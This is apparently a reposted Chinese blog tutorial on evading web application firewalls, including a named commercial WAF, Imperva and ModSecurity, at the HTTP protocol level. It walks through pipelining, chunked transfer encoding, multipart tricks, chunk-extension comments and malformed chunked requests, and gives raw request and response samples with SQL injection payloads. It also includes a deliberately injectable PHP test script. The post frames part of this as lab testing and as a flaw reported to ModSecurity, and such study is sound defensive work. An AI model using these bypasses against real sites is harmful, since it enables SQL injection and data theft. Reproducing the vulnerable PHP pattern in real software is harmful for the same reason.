0x00 原理

给服务器发送payload数据包,使得waf无法识别出payload,当apache,tomcat等web容器能正常解析其内容。如图一所示

0x02  实验环境

本机win10+xampp+某狗web应用防火墙最新版。为方便演示,存在sql注入的脚本中使用$_REQUEST["id"]来接收get,或者post提交的数据。waf配置为拦截url和post的and  or 注入,如图所示:

发送get请求或利用hackbar插件发送post请求payload均被拦截,如图所示:

0x03 绕过WAF方法

一·  利用pipline绕过[该方法经测试会被某狗拦截]

原理

http协议是由tcp协议封装而来,当浏览器发起一个http请求时,浏览器先和服务器建立起连接tcp连接,然后发送http数据包(即我们用burpsuite截获的数据),其中包含了一个Connection字段,一般值为close,apache等容器根据这个字段决定是保持该tcp连接或是断开。当发送的内容太大,超过一个http包容量,需要分多次发送时,值会变成keep-alive,即本次发起的http请求所建立的tcp连接不断开,直到所发送内容结束Connection为close为止。

1. 关闭burp的Repeater的Content-Length自动更新,如图四所示,点击红圈的Repeater在下拉选项中取消update Content-Length选中。这一步至关重要!!!

2. burp截获post提交

id= and =

,显示被waf拦截如图五所示。

3. 复制图五中的数据包黏贴到

id= and =

后面如图六所示。

4. 接着修改第一个数据包的数据部分,即将

id=+and+%3D1

修改为正常内容id=1,再将数据包的Content-Length的值设置为修改后的【id=1】的字符长度即4,最后将Connection字段值设为keep-alive。提交后如图七所示,会返回两个响应包,分别对应两个请求。

注意:从结果看,第一个正常数据包返回了正确内容,第二个包含有效载荷的数据包被某狗waf拦截,说明两数据包都能到达服务器,在面对其他waf时有可能可以绕过。无论如何这仍是一种可学习了解的绕过方法,且可以和接下来的方法进行组合使用绕过。

二.利用分块编码传输绕过[该方法可绕某狗]

原理:
在头部加入 Transfer-Encoding: chunked 之后,就代表这个报文采用了分块编码。这时,post请求报文中的数据部分需要改为用一系列分块来传输。每个分块包含十六进制的长度值和数据,长度值独占一行,长度不包括它结尾的,也不包括分块数据结尾的,且最后需要用0独占一行表示结束。
1. 开启上个实验中已关闭的content-length自动更新。给post请求包加入Transfer-Encoding: chunked后,将数据部分id=1 and 1=1进行分块编码(注意长度值必须为十六进制数),每一块里长度值独占一行,数据占一行如图八所示。
2.将上面图八数据包的
id= and =
改为
id= and =
 即将图八中所标的第4块的1改为2。如图九所示没有返回数据,payload生效。
 
注意:分块编码传输需要将关键字and,or,select ,union等关键字拆开编码,不然仍然会被waf拦截。编码过程中长度需包括空格的长度。最后用0表示编码结束,并在0后空两行表示数据包结束,不然点击提交按钮后会看到一直处于waiting状态。

三.利用协议未覆盖进行绕过[同样会被某狗拦截]

原理:

HTTP头里的Content-Type一般有application/x-www-form-urlencoded,multipart/form-data,text/plain三种,其中multipart/form-data表示数据被编码为一条消息,页上的每个控件对应消息中的一个部分。所以,当waf没有规则匹配该协议传输的数据时可被绕过。

1.将头部Content-Type改为multipart/form-data; boundary=69   然后设置分割符内的Content-Disposition的name为要传参数的名称。数据部分则放在分割结束符上一行。

由于是正常数据提交,所以从图十可知数据是能被apache容器正确解析的,尝试1 and 1=1也会被某狗waf拦截,但如果其他waf没有规则拦截这种方式提交的数据包,那么同样能绕过。

2.一般绕waf往往需要多种方式结合使用,如图十的示例中,只需将数据部分1 and 1=1用一个小数点”.”当作连接符即1.and 1=1就可以起到绕过作用。当然,这只是用小数点当连接符所起的作用而已。如图十一所示。

四.分块编码+协议未覆盖组合绕过

1.在协议未覆盖的数据包中加入Transfer-Encoding: chunked ,然后将数据部分全部进行分块编码,如图十二所示(数据部分为1 and 1=1)。
注意:第2块,第3块,第7块,和第8块。
第2块中需要满足
长度值 空行 Content-Disposition: name="id" 空行
这种形式,且长度值要将两个空行的长度计算在内(空行长度为2)。
第3块,即数据开始部分需满足
长度值 空行 数据
形式,且需将空行计算在内。
第7块即分割边界结束部分,需满足
长度值 空行 分割结束符 空行
形式,且计算空行长度在内。
第8块需满足
 空行 空行
形式。如果不同时满足这四块的形式要求,payload将不会生效。
 

0x04  绕过WAF技巧

一、技巧1:使用注释扰乱分块数据包

一些如Imperva,360等比较好的WAF已经对传输编码的分块传输做了处理,可以把分块组合成完整的HTTP数据包,这时直接使用常规的分块传输方法尝试绕过的话,会被WAF直接识别并阻断。

我们可以在[RFC7230]中查看到有关分块传输的定义规范。

Chunked Transfer Coding: The chunked transfer coding wraps the payload body

in order to

   transfer it as a series of chunks, each with its own size indicator,

   followed by an OPTIONAL trailer containing header fields.  Chunked

   enables content streams of unknown size to be transferred as a

   sequence of length-delimited buffers, which enables the sender to

   retain connection persistence and the recipient to know when it has

   received the entire message.

     chunked-body   = *chunk

                      last-chunk

                      trailer-part

                      CRLF

     chunk          = chunk-size [ chunk-ext ] CRLF

                      chunk-data CRLF

     chunk-size     = *HEXDIG

     last-chunk     = *("") [ chunk-ext ] CRLF

     chunk-data     = *OCTET ; a sequence of chunk-size octets

   The chunk-size field is a string of hex digits indicating the size of

   the chunk-data in octets.  The chunked transfer coding is complete

   when a chunk with a chunk-size of zero is received, possibly followed

   by a trailer, andfinally terminated by an empty line.

   A recipient MUST be able to parse and decode the chunked transfer

   coding.

Chunk Extensions:

   The chunked encoding allows each chunk to include zero or more chunk

   extensions, immediately following the chunk-size, for the sake of

   supplying per-chunk metadata (such as a signature or hash),

   mid-message control information, or randomization of message body

   size.

     chunk-ext      = *( ";" chunk-ext-name [ "=" chunk-ext-val ] )

     chunk-ext-name = token

     chunk-ext-val  = token / quoted-string

   The chunked encoding is specific to each connection andis likely to

   be removed or recoded by each recipient (including intermediaries)

   before any higher-level application would have a chance to inspect

   the extensions.  Hence, use of chunk extensions is generally limited

通过阅读规范发现分块传输可以在长度标识处加上分号“;”作为注释,如:

;kkkkk = ;ooo=   (两个换行)

几乎所有可以识别传输编码数据包的WAF,都没有处理分块数据包中长度标识处的注释,导致在分块数据包中加入注释的话,WAF就识别不出这个数据包了。

现在我们在使用了Imperva的应用防火墙的网站测试常规的分块传输数据包:

POST /xxxxxx.jsp HTTP/1.1 ......

Transfer-Encoding: Chunked

xxxxxxxxx

xx=xxxxxx

xxxxxxxxx

d

&a=    and    

=

(两个换行)

返回的结果如下图所示。

可以看到我们的攻击有效载荷“和2 = 2”被Imperva的WAF拦截了。

这时我们将分块传输数据包加入注释符。

POST /xxxxxx.jsp HTTP/1.1

......

Transfer-Encoding: Chunked

xxxxxxxxx

xx=xxxxxx

xxxxxxxxx

;testsdasdsad

d

;test

&a=    and

;test44444

=

(两个换行)

返回的结果如下图所示。

可以看到Imperva的已经不拦截这个负荷了。

二、技巧2:绕过ModSecurity

众所周知的ModSecurity是加载在中间件上的插件,所以不需要理会解析HTTP数据包的问题,因为中间件已经帮它处理完了,那么无论使用常规的分块还是加了注释的分块数据包,ModSecurity的都能直接获取到完整的HTTP数据包然后匹配危险关键字,所以一些基于ModSecurity的做的WAF产品难道就不受影响吗?

接下来我们在apache+ ModSecurity的环境做测试。

sql.php代码如下:

<?php

ini_set("display_errors", "On");

error_reporting(E_ALL);

$con = mysql_connect("localhost","root","");

if (!$con)

{

    die('Could not connect: ' . mysql_error());

}

mysql_select_db("test", $con);

$id = $_REQUEST["id"];

$sql = "select * from user where id=$id";

$result = mysql_query($sql,$con);

while($row = mysql_fetch_array($result))

{

    echo $row['name'] . " " . $row['password']."n";

}

mysql_close($con);

print"========GET==========n";

print_r($_GET);

print"========POST==========n";

print_r($_POST);

?><ahref="sqli.php?id=1"> sdfsdf </a>

ModSecurity的加载的规则拦截了请求包中的关键字“联盟”。

下面我们的请求和返回结果如下:

请求: http://10.10.10.10/sql.php?id=2%20union 返回:

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">

<html><head>

<title> Not Found</title>

</head><body>

<h1>Not Found</h1>

<p>The requested URL /sql.php was not found on this server.</p>

<hr>

<address>Apache/2.2. (CentOS) Server at 10.10.10.10 Port </address>

</body></html>

可以看到我们的“联盟”关键字被拦截了。

接下来我们传输一个畸形的分块数据包看看。

请求: POST /sql.php?id=2%20union HTTP/1.1 ...... Transfer-Encoding: chunked 1 aa 0 (两个换行) 返回:

<title> Bad Request</title>

</head><body>

<h1>Bad Request</h1>

<p>Your browser sent a request that this server could not understand.<br />

</p>

<hr>

<address>Apache/2.2. (CentOS) Server at 10.10.10.10 Port </address>

</body></html>

========GET==========

Array

(

   [id] =>  union

)

========POST==========

Array

(

)

可以看到虽然apache的报错了,但是因为apache的容错很强,所以我们提交的参数依然传到了PHP中,而我们的ModSecurity的并没有处理400错误的数据包,最终绕过了ModSecurity的。

接下来我们把的ModSecurity的规则改为过滤返回数据中包含的“根”的字符串,然后在sql.php脚本中加入打印“根”关键字的代码。

接着我们做如下测试:

请求: http:

//10.10.10.10/sql.php?id=1

返回:
<html><head>

<title> Forbidden</title>

</head><body>

<h1>Forbidden</h1>

<p>You don't have permission to access /sql.php

on this server.</p>

<hr>

<address>Apache/2.2. (CentOS) Server at 10.10.10.10 Port </address>

</body></html>

因为sql.php脚本中返回了带有“根”的关键字,所以直接就被ModSecurity的拦截了。这时我们改为发送畸形的分块数据包。

请求: POST /sql.php?id=

HTTP/1.1

Host: 10.10.10.10

Connection: keep-alive

Content-Type: application/x-www-form-urlencoded

Transfer-Encoding: chunked

Content-Length: 

(两个换行)
返回:
<html><head>

<title> Bad Request</title>

</head><body>

<h1>Bad Request</h1>

<p>Your browser sent a request that this server could not understand.<br />

</p>

<hr>

<address>Apache/2.2. (CentOS) Server at 10.10.10.10 Port </address>

</body></html>

root

========GET==========

Array

(

   [id] =>

)

========POST==========

Array

(

)


通过两个测试可以发现使用畸形的分块数据包可以直接绕过的ModSecurity的检测。这个问题我们在2017年4月已提交给了ModSecurity官方,但是因为种种问题目前依然未修复。


0x05 总结


以上是在http协议层面绕过waf,因为比较通用,所以理论上可以用于平时渗透时的方方面面,如命令执行,代码注入,sql注入等测试。虽然本文中只有分块编码真正做到了绕过某狗,但其他两种方法在其他waf绕过中可能仍然可用,而且可与其他绕过方法结合使用,甚至像四中一样相互组合使用


 


0x06  参考文献






 


 


 


 


 


 


 
												


											
Burpsuit分块传输插件绕WAF原理和技巧(转)的更多相关文章
	

    
								
  1. 利用分块传输绕WAF
		
    分块传输原理介绍 背景 HTTP Connection有两种连接方式:短连接和长连接: 短连接即一次请求对应一次TCP连接的建立和销毁过程. 长连接是多个请求共用同一个连接这样可以节省大量连接建立时间 ...
    
		
    2. 
						
  2. [转载]利用分块传输绕过WAF进行SQL注入
		
    原理 客户端给服务器发送数据的时候,如果我们利用协议去制作payload,就可以绕过http协议的waf,实现SQL注入 分块传输编码(Chunked transfer encoding)是HTTP中 ...
    
		
    3. 
						
  3. 绕WAF常见思路整理(一)
		
    最*被*台的一些事情搞得心态有点崩,很久没写文了 *期想整理一下常见的各种操作中绕过WAF的思路与免杀的思路(这部分之前没整理完以后有机会再说),受限于个人水*因素所以一定是不完全的,而且在WAF日新 ...
    
		
    4. 
						
  4. 绕WAF文章收集
		
    在看了bypassword的<在HTTP协议层面绕过WAF>之后,想起了之前做过的一些研究,所以写个简单的短文来补充一下文章里“分块传输”部分没提到的两个技巧. 技巧1 使用注释扰乱分块数 ...
    
		
    5. 
						
  5. 利用分块传输吊打所有WAF--学习笔记
		
    在看了bypassword的<在HTTP协议层面绕过WAF>之后,想起了之前做过的一些研究,所以写个简单的短文来补充一下文章里“分块传输”部分没提到的两个技巧. 技巧1 使用注释扰乱分块数 ...
    
		
    6. 
						
  6. HTTP 笔记与总结(9)分块传输、持久链接 与 反向 ajax(comet / server push / 服务器推技术)
		
    反向 ajax 又叫 comet / server push / 服务器推技术 应用范围:网页聊天服务器,例如新浪微博在线聊天.google mail 网页聊天 原理:一般而言,HTTP 协议的特点是 ...
    
		
    7. 
						
  7. HTTP协议之分块传输与分段编码
		
    目录 数据的分块传输 数据的分段编码(transfer-encoding) 前置知识:HTTP协议 数据的分块传输 我们都知道http协议是由TCP协议封装而来的应用层协议.我们和服务器之间的每次ht ...
    
		
    8. 
						
  8. HTTP分块传输
		
    HTTP分块传输 用途 对于在发送HTTP头部前,无法计算出Content-Length的HTTP请求及回复(例如WEB服务端产生的动态内容),可以使用分块传输,使得不至于等待所有数据产生后,再发送带 ...
    
		
    9. 
						
  9. 小白也能看懂插件化DroidPlugin原理(一)-- 动态代理
		
    前言:插件化在Android开发中的优点不言而喻,也有很多文章介绍插件化的优势,所以在此不再赘述.前一阵子在项目中用到 DroidPlugin 插件框架 ,近期准备投入生产环境时出现了一些小问题,所以 ...
    
		
    10. 
		

	


随机推荐
	

    
									
  1. 同步IO和异步IO的区别
			
    首先一个IO操作其实分成了两个步骤:发起IO请求和实际的IO操作,同步IO和异步IO的区别就在于第二个步骤是否阻塞,如果实际的IO读写阻塞请求进程,那么就是同步IO,因此阻塞IO.非阻塞IO.IO服用 ...
    
			
    2. 
						
  2. 网络对抗技术 2017-2018-2 20152515 Exp1 PC平台逆向破解(5)M
			
    Exp1 PC平台逆向破解(5)M 1 知识要求 2 直接修改程序机器指令,改变程序执行流程 3 通过构造输入参数,造成BOF攻击,改变程序执行流 4 注入Shellcode并执行 1 知识要求 掌握 ...
    
			
    3. 
						
  3. 20155308《网络对抗》Exp4 恶意代码分析
			
    20155308<网络对抗>Exp4 恶意代码分析 实践说明 实践目标 是监控你自己系统的运行状态,看有没有可疑的程序在运行. 是分析一个恶意软件,就分析Exp2或Exp3中生成后门软件: ...
    
			
    4. 
						
  4. 基于代的垃圾回收机制--《CLR via C#》读书笔记
			
    我们知道,垃圾回收在内存无限大的理想情况下是不需要的,正是因为内存存在的瓶颈,我们才需要垃圾回收.在<垃圾回收算法之引用计数算法>和<垃圾回收算法之引用跟踪算法>两篇文章中,我 ...
    
			
    5. 
						
  5. wordpress必装的插件 wp最常用的十个插件
			
    wordpress是世界上著名的博客系统,简称wp.一般新安装完wordpress以后,往往需要首先安装一些插件,这样才可以使用wordpress的更多功能.wp最常用的十个插件有哪些呢,可能根据每个 ...
    
			
    6. 
						
  6. 使用nginx很卡之strace命令
			
    一.strace命令常用参数 strace -tt -T -v -f -e trace= -p -tt 在每行输出的前面,显示毫秒级别的时间 -T 显示每次系统调用所花费的时间 -v 对于某些相关调用 ...
    
			
    7. 
						
  7. 通过实例来理解paxos算法
			
    背景   Paxos算法是莱斯利·兰伯特(Leslie Lamport,就是 LaTeX 中的”La”,此人现在在微软研究院)于1990年提出的一种基于消息传递的一致性算法.由于算法难以理解起初并没有 ...
    
			
    8. 
						
  8. 使用DOS工具修复数据库
			
    当SQL Server 实例出现异常,无法远程链接时,数据库管理员需要登陆到SQL Server实例机器上,通过命令行工具,修复异常. 一,使用net命令行启动数据库 通过net start 命令启动 ...
    
			
    9. 
						
  9. mybatis 初步使用(IDEA的Maven项目, 超详细)
			
    目录 创建 Maven 项目 Maven配置 pom.xml 创建数据库 配置Mybatis 配置mybatis的XML文件 创建实体类和对应的Mapper.xml 测试 源码 @ 创建 Maven  ...
    
			
    10. 
						
  10. vue JointJS 实例demo
			
    前言 越来越发现,前端深入好难哦!虐成渣渣了. 需求:前端绘制灵活的关系图(此demo还是简单的,我的需求才跨出一小步) 安装 npm install jointjs 容器,工具栏 <templ ...
    
			
    11.